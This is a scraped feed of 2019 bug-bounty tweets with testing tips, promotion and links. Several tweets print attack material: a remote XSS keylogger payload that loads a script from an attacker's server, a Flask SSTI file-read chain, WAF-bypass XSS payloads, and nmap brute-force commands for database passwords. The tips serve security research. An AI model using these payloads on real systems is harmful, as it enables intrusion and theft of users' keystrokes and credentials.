1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mCZqeZB8YT
National Cyber Security Services
@NationalCyberS1


2019-11-20 12:40:53
2 Configuring Frida with #BurpSuite and #Genymotion to #bypass #Android #SSL Pinning #LINK :- https://t.co/jLWK2f7dx6 #cybersecurity #Pentesting #pentest #hacking #bugbountytips #bugbounty #bugbountytip https://t.co/JIZt1QUzHi
x1m
@x1m_martijn


2019-11-20 09:23:49
0 Someone else is using my xsshunter payload :p I don't mind heheheh #bugbountytip
Vikash Chaudhary
@OffensiveHunter


2019-11-20 03:49:31
2 #BugBountyTip if you are not getting bounty then hunt these bugs on any program first , you will surely get. it's very easy to hunt these bugs. Regards! #Vikash #Chaudhary CEO & Founder (#HackersEra #Cyber #Security #Consultancy & #Training PVT LTD) mail
https://t.co/NHBnVkBMWH
YogoshaOfficial
@YogoshaOfficial


2019-11-19 16:08:30
10 [#bugbountytip] : If you're blocked by WAF during your pentest, try to hide your IP by forcing the proxy to remove all possible headers by using hop-by-hop headers Exp: Connection: close, X-Originating-IP ,X-Forwarded-For , X-Remote-IP , X-Remote-Addr @TnMch_
Mantis
@MantisSTS


2019-11-19 15:07:52
2 What word lists do you have most success with to find admin panels? RT for reach! #BugBounty #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-19 14:11:17
2 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting https://t.co/AjSRBqt57p
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-19 14:00:03
3 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #Pentesting https://t.co/0wdvBhdOHw
bugbountytip
@a_l_e_r_t_1_


2019-11-19 11:16:24
1 Stored XSS on gitlab - 2 #bugbountytips #bugbountytip https://t.co/eaW3avmcpK
Raad Haddad
@raadfhaddad


2019-11-19 07:17:36
2 Read headlines of the company's policies, make sure they implement it correctly, especially when it comes to insecure data storage. I found something related to this in Facebook last year! And yes, i got rewarded for my finding. #bugbountytip #bugbounty #security
_ABDOUL_GAFFHAR_
@mrgaphy


2019-11-19 06:21:42
0 My next open source project I want to make an automated tool that will search leak credentials in log and config files. I always seem to find exposed credentials in log or configuration files. #bugbountytips #BugBounty #bugbountytip #osint #pentest #webappsec #redteam #infosec
void
@gowridash


2019-11-19 04:57:35
0 @facebook Still Notification #bug #defect is not fixed? During shifting Mobile data/Wi-Fi already read/seen posts are showing as new ones #Android9 Is it so difficult to fix this #issue #bugbountytip
tololovejoi
@tolo7010


2019-11-18 23:01:07
0 1% of new bug bounty hunters ask for knowledge, 99% of them ask for motivation #bugbounty #bugbountytip #infosec #hacking
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-11-18 22:35:10
0 #bugbountytip #bugbountytios all of bug hunters writes try to understand web app. Writes some payloads :) But no one write about detection methodology :) Try to understand every vuln and what you need search in response body after sending payload.
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-18 22:14:56
1 Remember that *pht* files can be used to execute PHP code. Old #bugbountytip
m0z
@LooseSecurity


2019-11-18 18:41:49
6 I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountytips #BugBounty #bugbountytip payload not by me
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-18 18:07:09
0 [Tutorial] My Tutorial collection for SHELLING+ROOTING WEBSITES ----- COMMENT HERE and will share the link ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-18 17:56:50
0 Hacking Windows PC using Metasploit u TORRENT Tutorial by Hackdoor on WebDav_dll Hijacking https://t.co/yznzTvdCrC Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/OT1MPRtl86
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-18 17:40:28
1 [[[FREE]]] Biggest Repository of Ebooks (hacking, penetration testing, tool , programming and more) ! Comment Here and I will share the Link with you -- Limited Users only !! #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Halil AHMAD
@Halilahmadd


2019-11-18 11:33:37
0 Second Time Hall Of Fame #BugBounty #XSS #BugBountyTip #infosec https://t.co/Q0WGIKRgpt
HamdiSevben
@HmdSvbn


2019-11-18 11:08:14
0 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/fhokFhyIyj -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/C56oHA2Aua -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/RmE8h4eP6R #bugbountytip #Hacking #redteam
Ali TĂŒtĂŒncĂŒ
@alicanact60


2019-11-18 10:34:55
2 Last night, worked about 1 hour and got one triaged report. Waiting payment. @Hacker0x01 #BugBounty #bugbountyips #bugbountytip 1. Always look at all request. Maybe you can find a redirect parameter. 2. This payload can be useful for open redirects: //[email protected] https://t.co/VsUp6O1vCt
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-18 09:54:28
5 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/OOd6Z3Qc1M -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/HoinO16IyM -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/Lz7WTH1mzY #bugbountytip #Hacking #redteam
OCK le FĂ©cond
@OscLFecond


2019-11-18 07:36:58
1 How to Bypass SSL Pinning on Android : -Root your devices -Install your mitm cert -Moove it from data/misc/user/0/cacerts-added -To /system/etc/security/cacerts -No need Frida - Enjoy <3 #AndroidSecurity #MobileSecurity #bugbountytip #bugbountytips
Shantanu Kulkarni
@Iamshantanukul


2019-11-18 05:51:21
0 If a failed login caused application to send a warning email to user , any user data incorporated into the email may need to be checked for SMTP injection attacks. #bugbountytip #hackerone #bugcrowd #bughunting #bugbounty #pentesting #hacking #cybersecurity #bugbountytips
darkmage
@therealdarkmage


2019-11-18 05:35:52
0 Aw fooey, my most recent submission to @Bugcrowd was marked as "duplicate"...meaning it was still a legit concern! Heck yeah, I am learning and leveling up! - It was a open redirect on a website where I overcome a whitelist using a double-redirect 😎 #bugbounty #bugbountytip
Imran nissar
@Imrannissar3


2019-11-18 05:18:49
4 How bash can be used for automation #bugbounty #bugbountytip https://t.co/heUev6rsuI
m0z
@LooseSecurity


2019-11-17 20:46:27
0 Always remember to rest for SSTI (Server-Side Template Injection). Test for it the same way you would for XSS. A few simple payloads like {{7*7}} and if they get replaced by '49' then you've just found a high/critical vulnerability. You need to get a PoC though! #bugbountytip
Halil AHMAD
@Halilahmadd


2019-11-17 20:16:17
5 REMOTE XSS KEYLOGGER Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
ghostlulz
@ghostlulz1337


2019-11-17 18:37:46
7 I always seem to find exposed credentials in log or configuration files. These are easy wins that take 10 seconds to find. More info on my blog: https://t.co/Kft6p37wJM #bugbountytips #BugBounty #bugbountytip #osint #pentest #appsec #redteam #infosec #pentesting #logs #config https://t.co/Vf4AJs2sn7
A hacker's life
@Unknownuser1806


2019-11-17 12:12:55
0 STEALING $10,000 YAHOO COOKIES! https://t.co/PSImiH4oNc JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF: https://t.co/IpzdET7XVb #bugbounty,#bugbountytip,#cybersecurity,#hacking,#infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-17 10:30:09
2 Less than 1$... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AaUIgsgeiM
sagar yadav
@sagaryadav8742


2019-11-17 04:01:58
0 Fun time with @stokfredrik ✌ and @sechunt3r 😁in #bsidesahmedabad #bugbountytip #bugbounty #bughunting #bugcrowd #cobalt #nullcon #hackerone #Intel #BountyHunter #bounty #secure #zerocopter #happy #sagaryadav8742 https://t.co/vzkOVrKygS
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-17 02:38:05
0 #bugbountytip Always try to access the localStorage when you get an XSS vulnerability. Just managed to retrieve the JWT tokens and user PII information stored on localStorage.
Gillis Jones
@Gillis57


2019-11-17 00:29:13
0 #bugbountytip If you're using a shared environment, and see someone else's injections are messing up the environment for other testers- take the 5 minutes necessary to try to clean up after the other tester that don't respect you enough to do the same.
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-16 23:00:56
6 -1-Recon Everything.pdf: https://t.co/mRJV7fnMQg -2-Open Source Web Reconnaissance with Recon-ng.pdf: https://t.co/V1mV1NNzTB -3-12 OSINT Resources For E-mail Addresses.pdf: https://t.co/EgR3LoHoAm -4-OSINT.pdf: https://t.co/wDNvAWXATu #OSINT #bugbountytip #redteam #Pentesting
tololovejoi
@tolo7010


2019-11-16 20:55:10
3 Bug bounty is not possible if there is no publicly disclosed reports at @Hacker0x01 #bugbounty #bugbountytip #infosec #hacking
healthyoutlet
@healthyoutlet


2019-11-16 19:27:50
0 If you're writing cli tools that people will be using in bash, consider sending all your banners and verbose output to stderr so that the main output can be cleanly piped into other tools. In python you can use sys.stderr.write() #bugbountytip
swordfish
@swordfi96641916


2019-11-16 19:05:46
0 Response: Cannot GET / .. tried all the HTTP Request headers. Any tips on what's next? #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:41:28
0 site:"https://t.co/XdC6eMbugO" pdf -- High level information disclosure !!! User's phone numbers, addresses .... #bugbountytips #bugbountytip https://t.co/7qG4z5s7CZ
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:37:12
1 Less than 1$...(Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/Dq4zebkM4o
Berk Bulan
@berk_bulan


2019-11-16 14:56:09
0 Dns Zone Transfer script #BugBounty #bugbountytip #bugbountytips https://t.co/aKUoARVYQ7
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-16 14:32:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/nbOwGUl1dF
Hussein Daher
@HusseiN98D


2019-11-16 12:42:59
9 To everyone who has been following me, you know I was taking a #bugbounty challenge: 30days $30k Started 20/10. Some bugs still unpaid. I've failed. Still 4 more days to go to complete but I'll be stopping here, I feel really tired. #bugbountytip #bugbountytips #infosec #pentest https://t.co/VRoYeMrxuo
Elsadat
@M0_SADAT


2019-11-16 10:57:28
0 👉🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👇🏿👈🏿 đŸ‘‰đŸżđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘‡đŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘‰đŸŸđŸ‘‡đŸœđŸ‘‡đŸœđŸ‘‡đŸœđŸ‘‡đŸœđŸ‘‡đŸœđŸ‘‡đŸœđŸ‘‡đŸœđŸ‘ˆđŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘‰đŸŸđŸ‘‰đŸœđŸ‘‡đŸŒđŸ‘‡đŸŒđŸ‘‡đŸŒđŸ‘‡đŸŒđŸ‘‡đŸŒđŸ‘ˆđŸœđŸ‘ˆđŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘‰đŸŸđŸ‘‰đŸœđŸ‘‰đŸŒđŸ‘‡đŸ»đŸ‘‡đŸ»đŸ‘‡đŸ»đŸ‘ˆđŸŒđŸ‘ˆđŸœđŸ‘ˆđŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘‰đŸŸRead THE JS FILESđŸ‘ˆđŸœđŸ‘ˆđŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘‰đŸŸđŸ‘‰đŸœđŸ‘‰đŸŒđŸ‘†đŸ»đŸ‘†đŸ»đŸ‘†đŸ»đŸ‘ˆđŸŒđŸ‘ˆđŸœđŸ‘ˆđŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘‰đŸŸđŸ‘‰đŸœđŸ‘†đŸŒđŸ‘†đŸŒđŸ‘†đŸŒđŸ‘†đŸŒđŸ‘†đŸŒđŸ‘ˆđŸœđŸ‘ˆđŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘‰đŸŸđŸ‘†đŸœđŸ‘†đŸœđŸ‘†đŸœđŸ‘†đŸœđŸ‘†đŸœđŸ‘†đŸœđŸ‘†đŸœđŸ‘ˆđŸŸđŸ‘ˆđŸż đŸ‘‰đŸżđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘†đŸŸđŸ‘ˆđŸż 👉🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👆🏿👈🏿 #bugbountytip
Zero Xyele
@zeroxyele


2019-11-16 08:19:05
3 Simple Python Script for Host Header Redirection Attack [Multithreaded] https://t.co/LIHgGibs5Z I was awarded 150$ in ten minutes by using that tool 😎 #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101
evryd4y
@evryd4y


2019-11-16 05:56:12
1 Handy for passive enum https://t.co/G8fYKfqLTG #bugbountytip
Ashish Kunwar
@D0rkerDevil


2019-11-16 02:07:43
0 @TakSec Param miner extension can find this. :) #bugbountytip
Gillis Jones
@Gillis57


2019-11-15 23:40:15
0 #bugbountytip If you're using a shared environment with other testers. The rules are very similar to hiking. #leavenotrace- leave the environment like you found it. If you leave damn injections all over the place rendering it unusable, you're an asshole.
Hussein Daher
@HusseiN98D


2019-11-15 20:43:37
2 So today I've found an SQLi in a cookie. Many people only stick to parameters. Test cookies too! #bugbounty #bugbountytips #bugbountytip
Sagar Tanur
@Sagarvd01


2019-11-15 15:50:12
1 Here's a write up of how I could've accessed sensitive PII and private data of tens of thousands of Indians. https://t.co/uby8wggKPx #bugbounty #bugbountytips #BugBountyTip #hacking #infosec #writeup
Halil AHMAD
@Halilahmadd


2019-11-15 15:33:54
0 XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-15 13:55:48
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #bugbountytip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #bugbountytips https://t.co/np0PsJg3GY
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-15 12:38:47
8 -Brute forcing MySQL passwords: nmap -p3306 --script mysql-brute xx.xx.xx.xx -Brute forcing MS SQL passwords: nmap -p1433 --script ms-sql-brute xx.xx.xx.xx -Brute forcing Redis passwords: nmap -p6379 --script redis-brute xx.xx.xx.xx #nmap #hacking #Pentesting #BugBountyTip
Pascal S
@PascalSec


2019-11-15 12:22:39
0 [1/2] #BugBountyTip So this is a pretty basic one but I happen to forget about it over and over again. Before starting a new pentest engagement, clear all your cookies and browser cache. Happened to me many times before that I was asking myself what a specific cookie was for...
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-15 11:51:49
6 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -XSS via HTTP Headers.pdf: https://t.co/jiQJnioGwt -SQL Injection & XSS Playground.pdf: https://t.co/9QZCtkFcx7 -XSS Exploitation in DVWA (Bypass All Security).pdf: https://t.co/dzwO0TwHCF #bugbountytip #xss #Hacking
Elsadat
@M0_SADAT


2019-11-15 10:18:09
2 Finally✌Acknowledged by @BMW Security Team for 2019 after finding bug in the main domain ;) #bugbountytip ? 1-There is something left for you 2-Always try to Escalate everything you find! 3-NEVER GIVE UP HOF Link:https://t.co/RdsatALn39 (Ahmed Elsadat) #HOF #BugBounty #infosec https://t.co/otgetMsWC0
bugbountytip
@a_l_e_r_t_1_


2019-11-15 08:51:29
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/e5k6XeQeK2
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-15 02:35:29
7 -Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data.pdf: https://t.co/hM7HIZM56f -Pentesting Cheatsheet.pdf: https://t.co/tGxEQsqiQO -Windows Userland Persistence Fundamentals.pdf: https://t.co/uB0pSeXDP3 #PenTest #OSINT #bugbountytip #Hacking #infosec
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-14 23:24:33
4 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -Top GitHub Dorks and Tools: https://t.co/hM7HIZM56f -Pentesting Cheatsheet: https://t.co/zFwYAhCAba -Pentesting Cheatsheet2.pdf: https://t.co/34YEhESX58 -Pentesting Cheatsheets.pdf: https://t.co/tGxEQsqiQO #BugBountyTip
Sagar Tanur
@Sagarvd01


2019-11-14 17:02:57
0 A write up on how I was able to take over 4 tabs in Facebook's own Facebook pages. https://t.co/gmwro4xl5T #bugbounty #bugbountytips #BugBountyTip #writeup @Hacker0x01 @Bugcrowd
yourXss
@yourXss


2019-11-14 16:20:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal

YogoshaOfficial
@YogoshaOfficial


2019-11-14 13:33:08
7 [#Bugbountytip] ExpressJs runs on port 3000 , and if debug is on, then a lot of information can be disclosed exp : http[s]://example.com:3000/debug/pprof/heap?debug=1 Thanks @D0rkerDevil for this great tip ! Feel free to send us more #hackertips to share with the community
Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday i found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some times, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested y’all #BugBountyTip https://t.co/8GeWvj0YO9
.Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€ÌˆÌ’Ì‡Ì‰Ìœ Halil AHMAD .Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€Ìˆ
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
yourXss
@yourXss


2019-11-14 04:10:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal

bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 onliner to resolve the host of a given url #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RTđŸ‘ïž
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RTđŸ‘ïž
Noman | نŰčÙ…Ű§Ù† | à€šà„‹à€źà€Ÿà€š
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn Âź
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming đŸ‘ïž
.Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€ÌˆÌ’Ì‡Ì‰Ìœ Halil AHMAD .Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€Ìˆ
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:35:46
5 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ZTpv2Gq4ux
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:32:05
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/fzDOZJDHd6
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:30:38
1 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/jotHFAux1f
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
.Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€ÌˆÌ’Ì‡Ì‰Ìœ Halil AHMAD .Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€Ìˆ
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
